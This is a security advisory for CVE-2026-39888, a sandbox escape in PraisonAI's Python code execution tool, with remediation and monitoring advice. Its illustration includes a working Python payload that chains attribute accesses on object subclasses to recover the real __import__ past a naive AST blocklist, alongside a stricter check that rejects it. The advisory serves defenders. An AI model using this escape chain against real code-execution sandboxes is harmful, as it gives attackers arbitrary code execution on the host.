CVE-2026-39888
PraisonAI · PraisonAI
PraisonAI versions prior to 1.5.115 contain a sandbox escape vulnerability in its Python code execution tool, allowing arbitrary code execution.
Executive summary
A critical sandbox escape in PraisonAI's Python code execution tool lets an attacker who can get code into that tool bypass its sandbox restrictions and execute arbitrary code on the host running PraisonAI.
Vulnerability
In sandbox mode, execute_code() relies on an AST-based blocklist to filter submitted code. A blocklist rejects only the names and calls it enumerates, so an attacker can chain attribute accesses on ordinary objects to reach Python's internal built-ins, escape the sandbox, and achieve remote code execution with the privileges of the application.
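To show why a name-based AST blocklist is a weak sandbox boundary, here is an added, self-contained example. It is not PraisonAI's code and does not reproduce the specific chain used against execute_code(); every identifier in it (naive_blocklist_check, deny_dunder_check, run_sandboxed, BLOCKED_NAMES, SAFE_BUILTINS, ESCAPE, BENIGN) is an assumption made for the illustration. It builds a hypothetical blocklist sandbox, runs a constructed payload that reaches the real built-ins through textbook attribute chaining (a tuple literal's __class__ and __base__, object's __subclasses__, and a method's __globals__), and shows a stricter check rejecting that same payload while still allowing harmless code.

```python
import ast
import builtins

# Hypothetical blocklist sandbox (an illustration, not PraisonAI's execute_code()).
# It rejects imports plus a fixed set of dangerous names and attributes, then runs
# the code with a trimmed __builtins__ table. Every identifier here is an assumption.
BLOCKED_NAMES = {"__import__", "eval", "exec", "open", "compile", "globals",
                 "os", "sys", "subprocess"}
BLOCKED_ATTRS = {"__import__", "__builtins__", "system", "popen", "Popen"}
SAFE_BUILTINS = {"len": len, "range": range, "str": str}


def naive_blocklist_check(source):
    """Weak check: only the enumerated names and attributes are refused."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Name) and node.id in BLOCKED_NAMES:
            return False
        if isinstance(node, ast.Attribute) and node.attr in BLOCKED_ATTRS:
            return False
    return True


def deny_dunder_check(source):
    """Stricter check: refuse any dunder name or attribute, not just a fixed list.
    Still only defense in depth; see the note below the block."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            return False
        if isinstance(node, ast.Name):
            ident = node.id
        elif isinstance(node, ast.Attribute):
            ident = node.attr
        else:
            continue
        if ident in BLOCKED_NAMES or ident.startswith("__"):
            return False
    return True


def run_sandboxed(source, check):
    """Apply the AST check, then exec with a restricted builtins table.
    Returns the globals dict so callers can inspect what the code produced."""
    if not check(source):
        raise PermissionError("rejected by AST check")
    env = {"__builtins__": SAFE_BUILTINS}
    exec(compile(source, "<sandbox>", "exec"), env)
    return env


# Constructed payload: no blocked name or attribute appears in it, yet it walks
# from a tuple literal to object's subclasses, finds a Python-level __init__,
# reads the module globals behind it and lifts the real __import__ out of the
# module's __builtins__ (reached via a string key, which neither check inspects).
ESCAPE = """
recovered = None
for cls in ().__class__.__base__.__subclasses__():
    init = cls.__init__
    if init.__class__.__name__ != 'function':
        continue                      # C-implemented __init__ has no __globals__
    g = init.__globals__
    if '__builtins__' in g:
        b = g['__builtins__']         # a dict in imported modules, a module in __main__
        table = b if b.__class__.__name__ == 'dict' else b.__dict__
        recovered = table['__import__']
        break
"""

# Constructed benign snippet that a sandbox must keep allowing.
BENIGN = "total = 0\nfor i in range(5):\n    total += i\n"


def demonstrate_escape():
    """True when the naive blocklist lets ESCAPE recover the genuine __import__."""
    env = run_sandboxed(ESCAPE, naive_blocklist_check)
    return env["recovered"] is builtins.__import__


def hardened_rejects(source):
    """True when deny_dunder_check refuses the code before it runs."""
    try:
        run_sandboxed(source, deny_dunder_check)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print("naive blocklist passes payload:", naive_blocklist_check(ESCAPE))
    print("payload recovers real __import__:", demonstrate_escape())
    print("deny-dunder check rejects payload:", hardened_rejects(ESCAPE))
    print("benign code still runs, total =", run_sandboxed(BENIGN, deny_dunder_check)["total"])
```

The stricter check closes this particular chain, but it is still a filter over syntax, not an isolation boundary: string constants are not inspected (the payload already indexes a dict with '__import__' as a plain string), and any reachable helper that resolves attributes from strings would sidestep an attribute check entirely. Treat an AST filter as defense in depth and put the real boundary at the process level (separate unprivileged process, container, resource limits), which is what the compensating controls in the Remediation section describe.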
Business impact
Escaping the sandbox lets an attacker run arbitrary commands with the privileges of the PraisonAI process, and therefore reach anything that process can reach. Rated CVSS 9.9 (Critical), this vulnerability presents an extreme risk to server integrity and data confidentiality.
Remediation
Immediate Action: Upgrade PraisonAI to version 1.5.115 or later. If the upgrade cannot be applied at once, do not expose the Python code execution tool to untrusted input in the meantime.
Proactive Monitoring: Monitor for abnormal child processes spawned by the PraisonAI process (shells, network utilities, package managers), unexpected outbound connections, and file writes outside the application's working directory. Attempts to reach restricted Python built-ins will only show up in application logs if the tool records rejected code, so do not rely on that signal alone.
Compensating Controls: Run the application in a container as a non-root user with strict resource limits, a read-only root filesystem, dropped capabilities, and only the outbound network access the agent actually needs, so that a successful escape is confined to the container rather than the host. An AST filter is not a security boundary; process-level isolation is.
Exploitation status
Public Exploit Available: No
Analyst recommendation
This is a critical sandbox escape (CVSS 9.9) that fundamentally undermines the isolation PraisonAI's code execution tool is meant to provide. Upgrade to 1.5.115 or later immediately and keep process-level isolation in place afterwards; an AST filter should never be the only barrier around executed code.